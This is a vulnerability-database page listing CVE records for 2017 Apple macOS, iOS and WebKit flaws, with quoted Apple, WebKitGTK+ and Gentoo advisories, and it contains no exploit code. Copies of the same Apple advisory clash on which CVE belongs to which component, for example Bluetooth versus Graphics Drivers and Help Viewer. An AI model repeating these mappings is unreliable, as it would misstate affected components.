VARIoT IoT vulnerabilities database
| VAR-201702-0872 | CVE-2017-2358 | Apple macOS Graphic driver component vulnerable to arbitrary code execution in privileged context |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An issue was discovered in certain Apple products. macOS before 10.12.3 is affected. The issue involves the "Graphics Drivers" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. Apple macOS is prone to multiple security vulnerabilities. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-2 macOS 10.12.3
macOS 10.12.3 is now available and addresses the following:
apache_mod_php
Available for: macOS Sierra 10.12.2
Impact: Multiple issues in PHP
Description: Multiple issues were addressed by updating to PHP
version 5.6.28.
CVE-2016-8670
CVE-2016-9933
CVE-2016-9934
Bluetooth
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2358: Team Pangu and lokihardt at PwnFest 2016
Help Viewer
Available for: macOS Sierra 10.12.2
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A cross-site scripting issue was addressed through
improved URL validation.
CVE-2017-2361: lokihardt of Google Project Zero
IOAudioFamily
Available for: macOS Sierra 10.12.2
Impact: An application may be able to determine kernel memory layout
Description: An uninitialized memory issue was addressed through
improved memory management.
CVE-2017-2357: Team Pangu and lokihardt at PwnFest 2016
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: macOS Sierra 10.12.2
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
Vim
Available for: macOS Sierra 10.12.2
Impact: Opening a maliciously crafted file may lead to unexpected
application termination or arbitrary code execution
Description: An input validation issue existed in modelines. This was
addressed through improved input validation.
CVE-2016-1248: Florian Larysch
WebKit
Available for: macOS Sierra 10.12.2
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
macOS 10.12.3 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGymIQAMx3h6pTb1SLTCY4H4hUwQf2
tBd4osjrM7eX9kDBJXw9U3S5STs7Qyaiqjc+E3XvGXaeYQhZHurNEy+4HEaS2ctQ
toj0S/meE1bhJ79SKnRuEso0dG2coYAMY4CMWZpF5haEPISunMDrmitIDX6BU8ds
LhIvflT044wXzFsPbUfIMqG1a+1SHGoM3K0J61U6NU7dCSwyYmSGKH/0CTLuezy9
HOiPQJxvWVmfKVBZsYcaBp67AI5948LHdvat3gRq9WpgWpjUFjW/tLSbvZObaIjn
+I3JkVZ9ETuXa+ig42h+CJTz/CozqlC1OpX1YLJLMh4h5+kY9PNwh1kcsv+8jKxo
cbPNatn2uzoigRTWuhCe4Tic6kgri+3c8qR+ZPspNpUyLmentjpbygrkOKVLlNnG
HmV0YIWA+zp4TVgeMnqoEPTHF9kxxhBSPOjgyL2oYwpMHyXb2gmho7Xl9gQirw5T
Nyaoup4A7eT9jR5FBcAvhPPm5I+J44qEKB/D9hvWcQLGf1PR9/zxVd5QxlJZgm9u
loqWBNhPAqD36SPIOsIbkcjAaBKsrEAV01AizkMrhrN1KySscXeZeZ84p4nJusdD
M7bFysYMv7fvNe65V4I2Tc2iujqiPHsXdLRioAWSk7giNRggQtaM8s/C0KYtrJdK
ykSG8JpyNuTNAl1HJtv6
=pBIh
-----END PGP SIGNATURE-----
| VAR-201702-0871 | CVE-2017-2357 | Apple macOS of IOAudioFamily Vulnerability in component critical kernel memory layout information retrieval |
CVSS V2: 4.3 CVSS V3: 3.3 Severity: LOW |
An issue was discovered in certain Apple products. macOS before 10.12.3 is affected. The issue involves the "IOAudioFamily" component. It allows attackers to obtain sensitive kernel memory-layout information via a crafted app. Apple macOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code, to obtain sensitive information or cause a denial-of-service condition. IOAudioFamily is one of the input and output audio components. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-2 macOS 10.12.3
macOS 10.12.3 is now available and addresses the following:
apache_mod_php
Available for: macOS Sierra 10.12.2
Impact: Multiple issues in PHP
Description: Multiple issues were addressed by updating to PHP
version 5.6.28.
CVE-2016-8670
CVE-2016-9933
CVE-2016-9934
Bluetooth
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2353: Ian Beer of Google Project Zero
Graphics Drivers
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2358: Team Pangu and lokihardt at PwnFest 2016
Help Viewer
Available for: macOS Sierra 10.12.2
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A cross-site scripting issue was addressed through
improved URL validation.
CVE-2017-2357: Team Pangu and lokihardt at PwnFest 2016
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: macOS Sierra 10.12.2
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: macOS Sierra 10.12.2
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
Vim
Available for: macOS Sierra 10.12.2
Impact: Opening a maliciously crafted file may lead to unexpected
application termination or arbitrary code execution
Description: An input validation issue existed in modelines. This was
addressed through improved input validation.
CVE-2016-1248: Florian Larysch
WebKit
Available for: macOS Sierra 10.12.2
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
macOS 10.12.3 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGymIQAMx3h6pTb1SLTCY4H4hUwQf2
tBd4osjrM7eX9kDBJXw9U3S5STs7Qyaiqjc+E3XvGXaeYQhZHurNEy+4HEaS2ctQ
toj0S/meE1bhJ79SKnRuEso0dG2coYAMY4CMWZpF5haEPISunMDrmitIDX6BU8ds
LhIvflT044wXzFsPbUfIMqG1a+1SHGoM3K0J61U6NU7dCSwyYmSGKH/0CTLuezy9
HOiPQJxvWVmfKVBZsYcaBp67AI5948LHdvat3gRq9WpgWpjUFjW/tLSbvZObaIjn
+I3JkVZ9ETuXa+ig42h+CJTz/CozqlC1OpX1YLJLMh4h5+kY9PNwh1kcsv+8jKxo
cbPNatn2uzoigRTWuhCe4Tic6kgri+3c8qR+ZPspNpUyLmentjpbygrkOKVLlNnG
HmV0YIWA+zp4TVgeMnqoEPTHF9kxxhBSPOjgyL2oYwpMHyXb2gmho7Xl9gQirw5T
Nyaoup4A7eT9jR5FBcAvhPPm5I+J44qEKB/D9hvWcQLGf1PR9/zxVd5QxlJZgm9u
loqWBNhPAqD36SPIOsIbkcjAaBKsrEAV01AizkMrhrN1KySscXeZeZ84p4nJusdD
M7bFysYMv7fvNe65V4I2Tc2iujqiPHsXdLRioAWSk7giNRggQtaM8s/C0KYtrJdK
ykSG8JpyNuTNAl1HJtv6
=pBIh
-----END PGP SIGNATURE-----
| VAR-201702-0874 | CVE-2017-2360 | plural Apple Vulnerability in the kernel component of a product that allows arbitrary code execution in privileged contexts |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (use-after-free) via a crafted app. Apple iOS is a set of operating systems developed for mobile devices; tvOS is a set of smart TV operating systems; Apple watchOS is a set of smart watch operating systems.
Apple iOS, tvOS and watchOS have arbitrary code execution vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions.
Versions prior to iOS 10.2.1, watchOS 3.1.3 and tvOS 10.1.1 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards. This issue was addressed through improved input
validation.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2350: Gareth Heyes of Portswigger Web Security
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2355: Team Pangu and lokihardt at PwnFest 2016
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
This was addressed through improved input validation.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling. This
issue was addressed through improved validation.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked. This
was addressed through improved input validation.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "10.2.1".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
| VAR-201702-0884 | CVE-2017-2371 | Apple iOS Used in products such as WebKit Vulnerable to pop-up activation |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. The issue involves the "WebKit" component, which allows remote attackers to launch popups via a crafted web site. Webkit is prone to a security bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com).
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attack can use multiple vectors to execute arbitrary code or
cause a denial of service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
